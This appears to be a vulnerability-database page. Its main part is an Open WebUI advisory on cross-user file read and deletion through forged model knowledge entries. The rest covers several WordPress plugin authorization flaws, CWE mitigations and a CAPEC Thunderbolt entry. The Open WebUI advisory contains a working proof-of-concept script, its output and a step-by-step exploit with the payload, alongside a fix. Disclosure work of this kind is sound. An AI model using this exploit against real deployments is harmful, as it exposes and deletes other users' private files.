updated_at=model.updated_at,\n )\n\n try:\n models_module.get_async_db_context = lambda db=None: FakeDbContext(fake_db)\n models_module.AccessGrants.set_access_grants = fake_set_access_grants\n models_module.Models._to_model_model = types.MethodType(fake_to_model, models_module.Models)\n\n inserted = await models_module.Models.insert_new_model(\n models_module.ModelForm(\n id=\"attacker-model\",\n base_model_id=\"gpt-vision-base\",\n name=\"Attacker Model\",\n params={},\n meta={\n \"knowledge\": [\n {\n \"id\": victim_file_id,\n \"type\": \"file\",\n \"name\": \"victim-private.txt\",\n }\n ],\n \"builtinTools\": {\"knowledge\": True},\n },\n ),\n user_id=\"attacker\",\n )\n finally:\n models_module.get_async_db_context = original_context\n models_module.AccessGrants.set_access_grants = original_set_grants\n models_module.Models._to_model_model = original_to_model\n\n stored_meta = [getattr(row, \"meta\", None) for row in fake_db.added]\n stored_knowledge_ids = [\n item.get(\"id\")\n for meta in stored_meta\n for item in ((meta or {}).get(\"knowledge\") or [])\n ]\n\n return {\n \"insert_returned_model\": bool(inserted),\n \"db_commit_called\": fake_db.committed,\n \"stored_user_ids\": [getattr(row, \"user_id\", None) for row in fake_db.added],\n \"stored_model_ids\": [getattr(row, \"id\", None) for row in fake_db.added],\n \"stored_knowledge_file_ids\": stored_knowledge_ids,\n }\n\n\nasync def verify_view_file_trusts_model_knowledge(victim_file_id: str):\n class FakeFiles:\n looked_up_ids = []\n\n async def get_file_by_id(self, file_id, db=None):\n self.looked_up_ids.append(file_id)\n if file_id == victim_file_id:\n return SimpleNamespace(\n id=victim_file_id,\n user_id=\"victim\",\n filename=\"victim-private.txt\",\n data={\"content\": \"PRIVATE_MODEL_KNOWLEDGE_SECRET\"},\n created_at=1,\n updated_at=2,\n )\n return None\n\n async def fake_has_access_to_file(file_id, access_type, user, db=None):\n return False\n\n class FakeUserModel:\n def __init__(self, **kwargs):\n self.__dict__.update(kwargs)\n\n fake_files = FakeFiles()\n fake_files_module = types.SimpleNamespace(Files=fake_files)\n fake_file_acl_module = types.SimpleNamespace(has_access_to_file=fake_has_access_to_file)\n\n original_files_module = sys.modules.get(\"open_webui.models.files\")\n original_acl_module = sys.modules.get(\"open_webui.utils.access_control.files\")\n\n try:\n sys.modules[\"open_webui.models.files\"] = fake_files_module\n sys.modules[\"open_webui.utils.access_control.files\"] = fake_file_acl_module\n\n source = BUILTIN_TOOLS.read_text(encoding=\"utf-8\")\n tree = ast.parse(source, filename=str(BUILTIN_TOOLS))\n selected = [\n node\n for node in tree.body\n if isinstance(node, ast.AsyncFunctionDef) and node.name == \"view_file\"\n ]\n if len(selected) != 1:\n raise RuntimeError(\"could not find view_file\")\n module = ast.Module(body=selected, type_ignores=[])\n ast.fix_missing_locations(module)\n ns = {\n \"json\": json,\n \"Optional\": __import__(\"typing\").Optional,\n \"Request\": object,\n \"UserModel\": FakeUserModel,\n \"log\": SimpleNamespace(exception=lambda *args, **kwargs: None),\n \"MAX_VIEW_FILE_CHARS\": 100_000,\n \"DEFAULT_VIEW_FILE_MAX_CHARS\": 10_000,\n }\n exec(compile(module, str(BUILTIN_TOOLS), \"exec\"), ns)\n view_file = ns[\"view_file\"]\n\n denied_without_model_knowledge = await view_file(\n victim_file_id,\n __request__=SimpleNamespace(),\n __user__={\"id\": \"attacker\", \"role\": \"user\", \"name\": \"attacker\", \"email\": \"a@example.test\"},\n __model_knowledge__=[],\n )\n allowed_with_model_knowledge = await view_file(\n victim_file_id,\n __request__=SimpleNamespace(),\n __user__={\"id\": \"attacker\", \"role\": \"user\", \"name\": \"attacker\", \"email\": \"a@example.test\"},\n __model_knowledge__=[{\"id\": victim_file_id, \"type\": \"file\"}],\n )\n finally:\n if original_files_module is not None:\n sys.modules[\"open_webui.models.files\"] = original_files_module\n else:\n sys.modules.pop(\"open_webui.models.files\", None)\n if original_acl_module is not None:\n sys.modules[\"open_webui.utils.access_control.files\"] = original_acl_module\n else:\n sys.modules.pop(\"open_webui.utils.access_control.files\", None)\n\n denied = json.loads(denied_without_model_knowledge)\n allowed = json.loads(allowed_with_model_knowledge)\n return {\n \"file_ids_looked_up\": fake_files.looked_up_ids,\n \"without_model_knowledge\": denied,\n \"with_forged_model_knowledge\": allowed,\n \"private_content_disclosed\": allowed.get(\"content\") == \"PRIVATE_MODEL_KNOWLEDGE_SECRET\",\n }\n\n\nasync def main() -\u003e None:\n prepare_imports()\n victim_file_id = \"victim-private-file\"\n\n insert_sink = await verify_model_insert_accepts_victim_file(victim_file_id)\n tool_read = await verify_view_file_trusts_model_knowledge(victim_file_id)\n\n result = {\n \"confirmed\": (\n insert_sink[\"insert_returned_model\"] is True\n and insert_sink[\"stored_user_ids\"] == [\"attacker\"]\n and insert_sink[\"stored_knowledge_file_ids\"] == [victim_file_id]\n and tool_read[\"without_model_knowledge\"].get(\"error\") == \"File not found\"\n and tool_read[\"private_content_disclosed\"] is True\n ),\n \"attacker_user_id\": \"attacker\",\n \"victim_user_id\": \"victim\",\n \"victim_file_id\": victim_file_id,\n \"attacker_owns_file\": False,\n \"model_insert_sink\": insert_sink,\n \"tool_read\": tool_read,\n \"source\": {\n \"insert_sink\": \"backend/open_webui/models/models.py:Models.insert_new_model\",\n \"tool_injection\": \"backend/open_webui/utils/tools.py:get_builtin_tools passes model meta.knowledge as __model_knowledge__\",\n \"read_sink\": \"backend/open_webui/tools/builtin.py:view_file\",\n },\n }\n print(json.dumps(result, indent=2, sort_keys=True))\n if not result[\"confirmed\"]:\n raise SystemExit(1)\n\n\nif __name__ == \"__main__\":\n asyncio.run(main())\n```\n\nThe PoC executes the real `Models.insert_new_model()` sink and the real `view_file()` authorization branch with fake database/file adapters. It first confirms that the attacker-owned model stores a forged victim file ID in `meta.knowledge`, then confirms `view_file()` denies the same victim file without model knowledge but discloses content when the forged model knowledge entry is present.\n\nResult:\n\n```json\n{\n \"attacker_owns_file\": false,\n \"attacker_user_id\": \"attacker\",\n \"confirmed\": true,\n \"model_insert_sink\": {\n \"db_commit_called\": true,\n \"insert_returned_model\": true,\n \"stored_knowledge_file_ids\": [\n \"victim-private-file\"\n ],\n \"stored_model_ids\": [\n \"attacker-model\"\n ],\n \"stored_user_ids\": [\n \"attacker\"\n ]\n },\n \"tool_read\": {\n \"private_content_disclosed\": true,\n \"with_forged_model_knowledge\": {\n \"content\": \"PRIVATE_MODEL_KNOWLEDGE_SECRET\",\n \"filename\": \"victim-private.txt\",\n \"id\": \"victim-private-file\"\n },\n \"without_model_knowledge\": {\n \"error\": \"File not found\"\n }\n },\n \"victim_file_id\": \"victim-private-file\",\n \"victim_user_id\": \"victim\"\n}\n```\n\n## Exploit Sketch\n\n1. Attacker has permission to create or update workspace models.\n2. Attacker creates a model with:\n\n```json\n{\n \"meta\": {\n \"knowledge\": [\n {\n \"id\": \"VICTIM_FILE_ID\",\n \"type\": \"file\",\n \"name\": \"victim-private.txt\"\n }\n ],\n \"builtinTools\": {\n \"knowledge\": true\n }\n }\n}\n```\n\n3. Attacker chats with that model using native/built-in tools and invokes `view_file` for `VICTIM_FILE_ID`.\n4. The tool returns the victim file\u0027s extracted text content despite the attacker not owning or otherwise having access to the file.\n\n## Recommended Fix\n\nValidate `meta.knowledge` on every model write path: create, update, and import. For entries with `type == \"file\"`, require direct ownership, admin role, or `has_access_to_file(file_id, \u0027read\u0027, user, db=db)` before storing the entry. Validate the import payload before its surrounding try/except so a rejection surfaces as `403`, not `500`.\n\nDo not let `view_file()` treat `__model_knowledge__` as an authorization bypass; it should still enforce ownership/admin/`has_access_to_file()` per file ID. File deletion should require ownership, admin, or explicit write/delete access, not a read-derived model association.\n\n## Consolidation\n\nPer our Report Handling policy this consolidates independent reports of the same model `meta.knowledge` file-ID laundering flaw:\n\n- Read via forged `meta.knowledge` on model create, through the built-in `view_file` tool: @0xEr3n (earliest filing).\n- Distinct paths demonstrated by @5yu4n: the import endpoint (`POST /api/v1/models/import`), and cross-user read and deletion through the file API (`GET` / `DELETE /api/v1/files/{id}`) via `has_access_to_file()`\u0027s model branch.\n\nFix validates `meta.knowledge` ownership on create, update, and import; blocking the forged entry closes both read and delete. One CVE for the consolidated advisory.",
"id": "GHSA-vjqm-6gcc-62cr",
"modified": "2026-06-17T14:15:33Z",
"published": "2026-06-17T14:15:33Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-vjqm-6gcc-62cr"
},
{
"type": "PACKAGE",
"url": "https://github.com/open-webui/open-webui"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:L",
"type": "CVSS_V3"
}
],
"summary": "Open WebUI: Forged model meta.knowledge allows cross-user file read and deletion"
}
GHSA-VJR5-7GC7-RRHQ
Vulnerability from github – Published: 2024-12-16 15:31 – Updated: 2026-04-01 18:32Missing Authorization vulnerability in Blokhaus Minterpress allows Privilege Escalation.This issue affects Minterpress: from n/a through 1.0.5.
{
"affected": [],
"aliases": [
"CVE-2024-54379"
],
"database_specific": {
"cwe_ids": [
"CWE-862"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-12-16T15:15:11Z",
"severity": "HIGH"
},
"details": "Missing Authorization vulnerability in Blokhaus Minterpress allows Privilege Escalation.This issue affects Minterpress: from n/a through 1.0.5.",
"id": "GHSA-vjr5-7gc7-rrhq",
"modified": "2026-04-01T18:32:49Z",
"published": "2024-12-16T15:31:35Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-54379"
},
{
"type": "WEB",
"url": "https://patchstack.com/database/wordpress/plugin/minterpress/vulnerability/wordpress-minterpress-plugin-1-0-5-arbitrary-option-update-to-privilege-escalation-vulnerability?_s_id=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-VJR6-WPQM-J5FJ
Vulnerability from github – Published: 2026-02-21 12:30 – Updated: 2026-02-21 12:30The LearnPress Export Import – WordPress extension for LearnPress plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the 'delete_migrated_data' function in all versions up to, and including, 4.1.0. This makes it possible for unauthenticated attackers to delete course that have been migrated from Tutor LMS. The Tutor LMS plugin must be installed and activated in order to exploit the vulnerability.
{
"affected": [],
"aliases": [
"CVE-2026-1787"
],
"database_specific": {
"cwe_ids": [
"CWE-862"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-02-21T11:15:55Z",
"severity": "MODERATE"
},
"details": "The LearnPress Export Import \u2013 WordPress extension for LearnPress plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the \u0027delete_migrated_data\u0027 function in all versions up to, and including, 4.1.0. This makes it possible for unauthenticated attackers to delete course that have been migrated from Tutor LMS. The Tutor LMS plugin must be installed and activated in order to exploit the vulnerability.",
"id": "GHSA-vjr6-wpqm-j5fj",
"modified": "2026-02-21T12:30:26Z",
"published": "2026-02-21T12:30:26Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1787"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/browser/learnpress-import-export/tags/4.1.0/inc/Migration/Controllers/TutorMigrationController.php#L55"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/changeset/3458589"
},
{
"type": "WEB",
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/7bde915d-092a-452b-a0e0-ce5c2ce203dc?source=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L",
"type": "CVSS_V3"
}
]
}
GHSA-VJR8-7FM5-M79R
Vulnerability from github – Published: 2026-01-22 18:30 – Updated: 2026-01-27 18:32Missing Authorization vulnerability in Leap13 Premium Addons for Elementor premium-addons-for-elementor allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Premium Addons for Elementor: from n/a through <= 4.11.63.
{
"affected": [],
"aliases": [
"CVE-2025-69300"
],
"database_specific": {
"cwe_ids": [
"CWE-862"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-01-22T17:16:26Z",
"severity": "MODERATE"
},
"details": "Missing Authorization vulnerability in Leap13 Premium Addons for Elementor premium-addons-for-elementor allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Premium Addons for Elementor: from n/a through \u003c= 4.11.63.",
"id": "GHSA-vjr8-7fm5-m79r",
"modified": "2026-01-27T18:32:11Z",
"published": "2026-01-22T18:30:39Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69300"
},
{
"type": "WEB",
"url": "https://patchstack.com/database/Wordpress/Plugin/premium-addons-for-elementor/vulnerability/wordpress-premium-addons-for-elementor-plugin-4-11-63-settings-change-vulnerability?_s_id=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N",
"type": "CVSS_V3"
}
]
}
Mitigation
- Divide the product into anonymous, normal, privileged, and administrative areas. Reduce the attack surface by carefully mapping roles with data and functionality. Use role-based access control (RBAC) [REF-229] to enforce the roles at the appropriate boundaries.
- Note that this approach may not protect against horizontal authorization, i.e., it will not protect a user from attacking others with the same role.
Mitigation
Ensure that access control checks are performed related to the business logic. These checks may be different than the access control checks that are applied to more generic resources such as files, connections, processes, memory, and database records. For example, a database may restrict access for medical records to a specific database user, but each record might only be intended to be accessible to the patient and the patient's doctor [REF-7].
Mitigation MIT-4.4
Strategy: Libraries or Frameworks
- Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.
- For example, consider using authorization frameworks such as the JAAS Authorization Framework [REF-233] and the OWASP ESAPI Access Control feature [REF-45].
Mitigation
- For web applications, make sure that the access control mechanism is enforced correctly at the server side on every page. Users should not be able to access any unauthorized functionality or information by simply requesting direct access to that page.
- One way to do this is to ensure that all pages containing sensitive information are not cached, and that all such pages restrict access to requests that are accompanied by an active and authenticated session token associated with a user who has the required permissions to access that page.
Mitigation
Use the access control capabilities of your operating system and server environment and define your access control lists accordingly. Use a "default deny" policy when defining these ACLs.
CAPEC-665: Exploitation of Thunderbolt Protection Flaws
An adversary leverages a firmware weakness within the Thunderbolt protocol, on a computing device to manipulate Thunderbolt controller firmware in order to exploit vulnerabilities in the implementation of authorization and verification schemes within Thunderbolt protection mechanisms. Upon gaining physical access to a target device, the adversary conducts high-level firmware manipulation of the victim Thunderbolt controller SPI (Serial Peripheral Interface) flash, through the use of a SPI Programing device and an external Thunderbolt device, typically as the target device is booting up. If successful, this allows the adversary to modify memory, subvert authentication mechanisms, spoof identities and content, and extract data and memory from the target device. Currently 7 major vulnerabilities exist within Thunderbolt protocol with 9 attack vectors as noted in the Execution Flow.